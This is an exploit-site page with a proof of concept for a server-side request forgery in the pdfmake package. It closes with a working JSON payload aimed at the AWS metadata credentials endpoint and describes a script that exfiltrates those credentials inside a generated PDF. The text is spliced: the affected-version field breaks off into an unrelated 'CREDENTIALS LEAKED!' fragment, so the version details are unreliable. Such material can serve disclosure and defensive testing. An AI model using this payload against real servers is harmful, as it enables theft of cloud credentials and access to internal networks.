Share
## https://sploitus.com/exploit?id=767AA85A-5D36-5F38-BB40-2F01742E21DC
# pdfmake SSRF Vulnerability PoC

## Vulnerability Summary

| Field | Value |
|-------|-------|
| Package | pdfmake |
| Version | >= 0.3.0-beta.2, >> CREDENTIALS LEAKED! <<<
```

This proves the vulnerable server made an outbound request to our controlled endpoint.

### Full Read SSRF (`npm run exfiltrate`)

The attack script generates `exfiltrated.pdf`. Open it in any PDF viewer and the AWS credentials JSON is embedded as a file attachment (`metadata.json`). This proves full data exfiltration, not just blind SSRF. The attacker gets the actual response body back inside the PDF.

## Real-World Impact

1. **AWS/GCP/Azure Credential Theft** - Access cloud metadata endpoints
2. **Internal Network Access** - Reach internal services
3. **Port Scanning** - Enumerate internal infrastructure
4. **Auth Bypass** - Custom headers to bypass authentication

## Attack Payload

```json
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}
```